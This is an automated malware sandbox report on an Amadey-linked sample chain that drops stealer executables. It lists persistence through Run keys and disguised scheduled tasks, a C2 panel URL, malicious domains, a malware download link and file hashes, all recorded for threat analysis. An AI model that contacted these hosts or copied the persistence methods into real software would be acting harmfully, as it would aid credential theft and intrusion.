Excluded IPs from analysis (whitelisted): 199.232.214.172, 192.229.221.95, 142.250.181.99, 172.217.19.206, 64.233.164.84, 172.217.17.46, 172.217.17.67, 172.217.17.42, 172.217.17.74, 172.217.19.202, 142.250.181.138, 172.217.19.234, 142.250.181.10, 142.250.181.106, 142.250.181.74, 142.250.181.42, 172.217.19.10, 44.228.225.150, 35.85.93.176, 54.213.181.160, 23.200.87.12, 23.200.86.251, 4.245.163.56, 13.107.246.63, 23.218.208.109, 20.190.147.2, 20.189.173.20, 20.189.173.26
Excluded domains from analysis (whitelisted): dare-curbys.biz, impend-differ.biz, ciscobinary.openh264.org, slscr.update.microsoft.com, incoming.telemetry.mozilla.org, clientservices.googleapis.com, a17.rackcdn.com.mdc.edgesuite.net, aus5.mozilla.org, covery-mover.biz, a19.dscg10.akamai.net, clients2.google.com, ocsp.digicert.com, redirector.gvt1.com, login.live.com, safebrowsing.googleapis.com, dwell-exclaim.biz, www.gstatic.com, fs.microsoft.com, shavar.prod.mozaws.net, accounts.google.com, otelrules.azureedge.net, self.events.data.microsoft.com, t.me, zinc-sneark.biz, ctldl.windowsupdate.com, ogads-pa.googleapis.com, cineft.online, detectportal.prod.mozaws.net, formy-spill.biz, fe3cr.delivery.mp.microsoft.com, se-blurry.biz, print-vexer.biz, umwatson.events.data.microsoft.com, clients.l.google.com, location.services.mozilla.com, drive-connect.cyou
Execution Graph export aborted for target H9TU4oY.exe, PID 5444 because there are no executed function
Execution Graph export aborted for target c1ca3b12e5.exe, PID 1276 because there are no executed function
HTTP sessions have been limited to 150. Please view the PCAPs for the complete data.
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size exceeded maximum capacity and may have missing network information.
Report size getting too big, too many NtCreateFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: file.exe

Simulations

Behavior and APIs

Time	Type	Description
17:58:02	API Interceptor	3173776x Sleep call for process: skotes.exe modified
17:58:23	API Interceptor	5x Sleep call for process: H9TU4oY.exe modified
17:58:41	API Interceptor	14x Sleep call for process: c1ca3b12e5.exe modified
17:58:52	API Interceptor	1807939x Sleep call for process: ZiYbk6W.exe modified
17:58:55	API Interceptor	423x Sleep call for process: 232a1df2aa.exe modified
17:59:39	API Interceptor	1x Sleep call for process: firefox.exe modified
22:57:03	Task Scheduler	Run new task: skotes path: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
22:58:28	Task Scheduler	Run new task: chromes path: "C:\Users\user\AppData\Roaming\chromes.exe"
22:58:36	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run c1ca3b12e5.exe C:\Users\user\AppData\Local\Temp\1015352001\c1ca3b12e5.exe
22:58:44	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 232a1df2aa.exe C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe
22:58:53	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 855be7cecf.exe C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe
22:59:01	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 2befb05fec.exe C:\Users\user\AppData\Local\Temp\1015355001\2befb05fec.exe
22:59:09	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run c1ca3b12e5.exe C:\Users\user\AppData\Local\Temp\1015352001\c1ca3b12e5.exe
22:59:18	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run 232a1df2aa.exe C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe
22:59:22	Task Scheduler	Run new task: Intel_PTT_EK_Recertification path: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe
22:59:27	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run 855be7cecf.exe C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe
22:59:35	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run 2befb05fec.exe C:\Users\user\AppData\Local\Temp\1015355001\2befb05fec.exe
23:04:00	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 6ee1ef793e.exe C:\Users\user\AppData\Local\Temp\1015360001\6ee1ef793e.exe
23:04:09	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 19dd885187.exe C:\Users\user\AppData\Local\Temp\1015361001\19dd885187.exe
23:04:18	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run c1d9aa6317.exe C:\Users\user\AppData\Local\Temp\1015362001\c1d9aa6317.exe
23:04:26	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 09d34a0a11.exe C:\Users\user\AppData\Local\Temp\1015363001\09d34a0a11.exe
23:04:35	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run 6ee1ef793e.exe C:\Users\user\AppData\Local\Temp\1015360001\6ee1ef793e.exe
23:04:44	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run 19dd885187.exe C:\Users\user\AppData\Local\Temp\1015361001\19dd885187.exe
23:04:52	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run c1d9aa6317.exe C:\Users\user\AppData\Local\Temp\1015362001\c1d9aa6317.exe
23:05:01	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run 09d34a0a11.exe C:\Users\user\AppData\Local\Temp\1015363001\09d34a0a11.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
185.215.113.43	file.exe	Get hash	malicious	ScreenConnect Tool, Amadey, LummaC Stealer, Vidar, XWorm, Xmrig	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	Amadey, LummaC Stealer, Stealc, Vidar, Xmrig	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	Amadey, AsyncRAT, HVNC, LummaC Stealer, RedLine, Stealc	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, PureLog Stealer, Stealc, Vidar	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, Xmrig	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, Xmrig	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, Xmrig	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, Xmrig	Browse	185.215.113.43/Zu7JuNko/index.php
104.21.64.1	SH8ZyOWNi2.exe	Get hash	malicious	CMSBrute	Browse	adsfirm.com/administrator/index.php
104.21.64.1	PO2412010.exe	Get hash	malicious	FormBook	Browse	www.bser101pp.buzz/v89f/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
services.addons.mozilla.org	file.exe	Get hash	malicious	Amadey, LummaC Stealer, Stealc, Vidar, Xmrig	Browse	151.101.65.91
	file.exe	Get hash	malicious	Amadey, AsyncRAT, HVNC, LummaC Stealer, RedLine, Stealc	Browse	151.101.193.91
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse	151.101.193.91
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, Xmrig	Browse	151.101.193.91
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, Xmrig	Browse	151.101.1.91
	file.exe	Get hash	malicious	Credential Flusher	Browse	151.101.1.91
	file.exe	Get hash	malicious	Credential Flusher	Browse	151.101.65.91
	file.exe	Get hash	malicious	Credential Flusher	Browse	151.101.129.91
	file.exe	Get hash	malicious	Credential Flusher	Browse	151.101.65.91
	file.exe	Get hash	malicious	Credential Flusher	Browse	151.101.65.91
example.org	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse	93.184.215.14
	file.exe	Get hash	malicious	Amadey, LummaC Stealer, Stealc, Vidar, Xmrig	Browse	93.184.215.14
	file.exe	Get hash	malicious	Amadey, AsyncRAT, HVNC, LummaC Stealer, RedLine, Stealc	Browse	93.184.215.14
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse	93.184.215.14
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, PureLog Stealer, Stealc, Vidar	Browse	93.184.215.14
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, Xmrig	Browse	93.184.215.14
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, Xmrig	Browse	93.184.215.14
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, Xmrig	Browse	93.184.215.14
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, Xmrig	Browse	93.184.215.14
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, Xmrig	Browse	93.184.215.14
immureprech.biz	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse	104.21.22.222
	file.exe	Get hash	malicious	Amadey, LummaC Stealer, Stealc, Vidar, Xmrig	Browse	172.67.207.38
	rHrG691f7q.exe	Get hash	malicious	LummaC	Browse	104.21.22.222
	TN78WX7nJU.exe	Get hash	malicious	LummaC	Browse	104.21.22.222
	XIaCqh1vRm.exe	Get hash	malicious	LummaC	Browse	104.21.22.222
	QQx0tdFC0b.exe	Get hash	malicious	LummaC	Browse	104.21.22.222
	HIDE0RerES.exe	Get hash	malicious	LummaC	Browse	172.67.207.38
	Dqw8QFydEX.exe	Get hash	malicious	LummaC	Browse	104.21.22.222
	SET_UP.exe	Get hash	malicious	LummaC	Browse	172.67.207.38
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse	104.21.22.222
deafeninggeh.biz	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse	104.21.32.1
	file.exe	Get hash	malicious	Amadey, LummaC Stealer, Stealc, Vidar, Xmrig	Browse	104.21.16.1
	rHrG691f7q.exe	Get hash	malicious	LummaC	Browse	104.21.96.1
	TN78WX7nJU.exe	Get hash	malicious	LummaC	Browse	104.21.96.1
	XIaCqh1vRm.exe	Get hash	malicious	LummaC	Browse	104.21.96.1
	QQx0tdFC0b.exe	Get hash	malicious	LummaC	Browse	104.21.112.1
	HIDE0RerES.exe	Get hash	malicious	LummaC	Browse	104.21.112.1
	Dqw8QFydEX.exe	Get hash	malicious	LummaC	Browse	104.21.112.1
	SET_UP.exe	Get hash	malicious	LummaC	Browse	104.21.112.1
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse	104.21.96.1

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
GOOGLE-AS-APGoogleAsiaPacificPteLtdSG	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse	34.117.188.166
	TRC.mpsl.elf	Get hash	malicious	Mirai	Browse	34.66.152.246
	TRC.sh4.elf	Get hash	malicious	Mirai	Browse	34.65.156.142
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse	34.117.188.166
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, PureLog Stealer, Stealc, Vidar	Browse	34.117.188.166
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, Xmrig	Browse	34.117.188.166
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, Xmrig	Browse	34.117.188.166
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, Xmrig	Browse	34.117.188.166
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, Xmrig	Browse	34.117.188.166
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, Xmrig	Browse	34.117.188.166
CLOUDFLARENETUS	https://f29cc861.solaraweb-alj.pages.dev/download/static/files/Bootstrapper.exe	Get hash	malicious	HTMLPhisher	Browse	104.21.93.27
	https://f29cc861.solaraweb-alj.pages.dev/download/static/files/Bootstrapper.exe	Get hash	malicious	HTMLPhisher	Browse	172.66.44.59
	file.exe	Get hash	malicious	ScreenConnect Tool, Amadey, LummaC Stealer, Vidar, XWorm, Xmrig	Browse	104.21.79.7
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse	104.21.79.7
	RdLfpZY5A9.exe	Get hash	malicious	77Rootkit, XWorm	Browse	104.20.4.235
	file.exe	Get hash	malicious	Amadey, LummaC Stealer, Stealc, Vidar, Xmrig	Browse	172.67.207.38
	https://qr.me-qr.com/nl/sWBHqqwx	Get hash	malicious	Unknown	Browse	104.26.3.190
	file.exe	Get hash	malicious	Amadey, AsyncRAT, HVNC, LummaC Stealer, RedLine, Stealc	Browse	104.21.35.43
	Gosjeufon.cpl.exe	Get hash	malicious	Unknown	Browse	1.1.1.1
	rHrG691f7q.exe	Get hash	malicious	LummaC	Browse	104.21.56.70
WHOLESALECONNECTIONSNL	file.exe	Get hash	malicious	ScreenConnect Tool, Amadey, LummaC Stealer, Vidar, XWorm, Xmrig	Browse	185.215.113.16
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse	185.215.113.206
	file.exe	Get hash	malicious	Amadey, LummaC Stealer, Stealc, Vidar, Xmrig	Browse	185.215.113.16
	file.exe	Get hash	malicious	Amadey, AsyncRAT, HVNC, LummaC Stealer, RedLine, Stealc	Browse	185.215.113.16
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse	185.215.113.206
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, PureLog Stealer, Stealc, Vidar	Browse	185.215.113.16
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, Xmrig	Browse	185.215.113.16
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, Xmrig	Browse	185.215.113.16
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, Xmrig	Browse	185.215.113.16
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, Xmrig	Browse	185.215.113.16
CLOUDFLARENETUS	https://f29cc861.solaraweb-alj.pages.dev/download/static/files/Bootstrapper.exe	Get hash	malicious	HTMLPhisher	Browse	104.21.93.27
	https://f29cc861.solaraweb-alj.pages.dev/download/static/files/Bootstrapper.exe	Get hash	malicious	HTMLPhisher	Browse	172.66.44.59
	file.exe	Get hash	malicious	ScreenConnect Tool, Amadey, LummaC Stealer, Vidar, XWorm, Xmrig	Browse	104.21.79.7
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse	104.21.79.7
	RdLfpZY5A9.exe	Get hash	malicious	77Rootkit, XWorm	Browse	104.20.4.235
	file.exe	Get hash	malicious	Amadey, LummaC Stealer, Stealc, Vidar, Xmrig	Browse	172.67.207.38
	https://qr.me-qr.com/nl/sWBHqqwx	Get hash	malicious	Unknown	Browse	104.26.3.190
	file.exe	Get hash	malicious	Amadey, AsyncRAT, HVNC, LummaC Stealer, RedLine, Stealc	Browse	104.21.35.43
	Gosjeufon.cpl.exe	Get hash	malicious	Unknown	Browse	1.1.1.1
	rHrG691f7q.exe	Get hash	malicious	LummaC	Browse	104.21.56.70

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	file.exe	Get hash	malicious	ScreenConnect Tool, Amadey, LummaC Stealer, Vidar, XWorm, Xmrig	Browse	104.21.22.222 104.21.50.161 104.102.49.254 104.21.51.88 104.21.64.1 104.21.79.7 172.67.207.38
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse	104.21.22.222 104.21.50.161 104.102.49.254 104.21.51.88 104.21.64.1 104.21.79.7 172.67.207.38
	file.exe	Get hash	malicious	Amadey, LummaC Stealer, Stealc, Vidar, Xmrig	Browse	104.21.22.222 104.21.50.161 104.102.49.254 104.21.51.88 104.21.64.1 104.21.79.7 172.67.207.38
	file.exe	Get hash	malicious	Amadey, AsyncRAT, HVNC, LummaC Stealer, RedLine, Stealc	Browse	104.21.22.222 104.21.50.161 104.102.49.254 104.21.51.88 104.21.64.1 104.21.79.7 172.67.207.38
	rHrG691f7q.exe	Get hash	malicious	LummaC	Browse	104.21.22.222 104.21.50.161 104.102.49.254 104.21.51.88 104.21.64.1 104.21.79.7 172.67.207.38
	TN78WX7nJU.exe	Get hash	malicious	LummaC	Browse	104.21.22.222 104.21.50.161 104.102.49.254 104.21.51.88 104.21.64.1 104.21.79.7 172.67.207.38
	XIaCqh1vRm.exe	Get hash	malicious	LummaC	Browse	104.21.22.222 104.21.50.161 104.102.49.254 104.21.51.88 104.21.64.1 104.21.79.7 172.67.207.38
	QQx0tdFC0b.exe	Get hash	malicious	LummaC	Browse	104.21.22.222 104.21.50.161 104.102.49.254 104.21.51.88 104.21.64.1 104.21.79.7 172.67.207.38
	HIDE0RerES.exe	Get hash	malicious	LummaC	Browse	104.21.22.222 104.21.50.161 104.102.49.254 104.21.51.88 104.21.64.1 104.21.79.7 172.67.207.38
	Dqw8QFydEX.exe	Get hash	malicious	LummaC	Browse	104.21.22.222 104.21.50.161 104.102.49.254 104.21.51.88 104.21.64.1 104.21.79.7 172.67.207.38
fb0aa01abe9d8e4037eb3473ca6e2dca	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse	151.101.193.91 35.244.181.201 34.149.100.209 34.160.144.191 34.120.208.123
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse	151.101.193.91 35.244.181.201 34.149.100.209 34.160.144.191 34.120.208.123
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, PureLog Stealer, Stealc, Vidar	Browse	151.101.193.91 35.244.181.201 34.149.100.209 34.160.144.191 34.120.208.123
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, Xmrig	Browse	151.101.193.91 35.244.181.201 34.149.100.209 34.160.144.191 34.120.208.123
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, Xmrig	Browse	151.101.193.91 35.244.181.201 34.149.100.209 34.160.144.191 34.120.208.123
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, Xmrig	Browse	151.101.193.91 35.244.181.201 34.149.100.209 34.160.144.191 34.120.208.123
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, Xmrig	Browse	151.101.193.91 35.244.181.201 34.149.100.209 34.160.144.191 34.120.208.123
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, Xmrig	Browse	151.101.193.91 35.244.181.201 34.149.100.209 34.160.144.191 34.120.208.123
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse	151.101.193.91 35.244.181.201 34.149.100.209 34.160.144.191 34.120.208.123
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse	151.101.193.91 35.244.181.201 34.149.100.209 34.160.144.191 34.120.208.123
37f463bf4616ecd445d4a1937da06e19	file.exe	Get hash	malicious	ScreenConnect Tool, Amadey, LummaC Stealer, Vidar, XWorm, Xmrig	Browse	149.154.167.99 116.203.12.241
	file.exe	Get hash	malicious	Amadey, LummaC Stealer, Stealc, Vidar, Xmrig	Browse	149.154.167.99 116.203.12.241
	build.msi	Get hash	malicious	Unknown	Browse	149.154.167.99 116.203.12.241
	rHrG691f7q.exe	Get hash	malicious	LummaC	Browse	149.154.167.99 116.203.12.241
	Setup.msi	Get hash	malicious	Unknown	Browse	149.154.167.99 116.203.12.241
	setup.msi	Get hash	malicious	Unknown	Browse	149.154.167.99 116.203.12.241
	TN78WX7nJU.exe	Get hash	malicious	LummaC	Browse	149.154.167.99 116.203.12.241
	XIaCqh1vRm.exe	Get hash	malicious	LummaC	Browse	149.154.167.99 116.203.12.241
	PO_0099822111ORDER.js	Get hash	malicious	Remcos	Browse	149.154.167.99 116.203.12.241
	QQx0tdFC0b.exe	Get hash	malicious	LummaC	Browse	149.154.167.99 116.203.12.241

Process:	C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\IIEBGIDAAFHIJJJJEGCG

Download File

Process:	C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\JKJDBAAAEHIEGCAKFHCG

Download File

Process:	C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\H9TU4oY[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1834496
Entropy (8bit):	7.947620086095118
Encrypted:	false
SSDEEP:	49152:05+SKvXhag1L9rYoMaf3nHwKUXBKTgEdjVS1:y+SKvh11VYoMafg1BSpVS1
MD5:	6C1D0DABE1EC5E928F27B3223F25C26B
SHA1:	E25AB704A6E9B3E4C30A6C1F7043598A13856AD9
SHA-256:	92228A0012605351CF08DF9A2AD4B93FA552D7A75991F81FB80F1AE854A0E57D
SHA-512:	3A3F7AF4F6018FCBD8C6F2871270504731CF269134453C9A146351C3E4A5C89165ECCCAFB3655D8B39C1FF1EC68F06E1851C0ABD66D47602E1F0F8E36D4ACFE9
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...b.Yg..............................H...........@...........................H..........@.................................T0..h.... .......................1...................................................................................... . .........H..................@....rsrc........ .......X..............@....idata .....0.......Z..............@... ..)..@.......\..............@...ubvmxkob.........z...^..............@...xdawalmh.....pH.....................@....taggant.0....H.."..................@...................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	970752
Entropy (8bit):	6.703941229502815
Encrypted:	false
SSDEEP:	24576:CqDEvCTbMWu7rQYlBQcBiT6rprG8aY8Ob:CTvC/MTQYxsWR7aY
MD5:	33E2A0EC0B8839B1DBECB8FC59CEE37A
SHA1:	B9550871DE00BD87C5E8990FF32E7771BF634905
SHA-256:	8E55D8585F852454BA66BE697EFAD31F7D0ABA3A7105587608F9A5C7F51EE4A6
SHA-512:	B25596892A989D0C7ABD7CBAFEDACDE68D258EB619C40E2775AE2FEDA2133ECB977E0497F8FC1F37D032867B4D4549105A832B2CCAAD3E903DB4230B53FABDB5
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$...................j:......j:..C...j:......@.*...........................n......~............{.......{......{.......z....{......Rich...................PE..L.....^g..........".......... ......w.............@..........................0.......c....@...@.......@.....................d...\|....@..Le.......................u...........................4..........@............................................text............................... ..`.rdata..............................@..@.data...lp.......H..................@....rsrc...Le...@...f..................@..@.reloc...u.......v...Z..............@..B........................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1870848
Entropy (8bit):	7.948256943637
Encrypted:	false
SSDEEP:	49152:yKD0uV1wnSX/yZviIF03twYZlzy3IrS7ZNL+g9is:yedVSSXoviIy3lGYyZf
MD5:	6255D0D884765ABD3BB418F367CAA8E9
SHA1:	1E1FAF3970EBE15E3D2EB1CF45CB15B56B42DB8B
SHA-256:	CF0980521BB8139A249205FCB0FC320A43B182C694DB7F8D4E3DECA0E1C65F97
SHA-512:	1B666EBE033ADA719D3E9FEC9CDC4E4BE7BFF472FCF184BCBA41AD9D39D92B65816BC3ABBE29DCA90DE96298D27CF8FAAB2866D7DA1508AC2369528FBCCBAF35
Malicious:	true
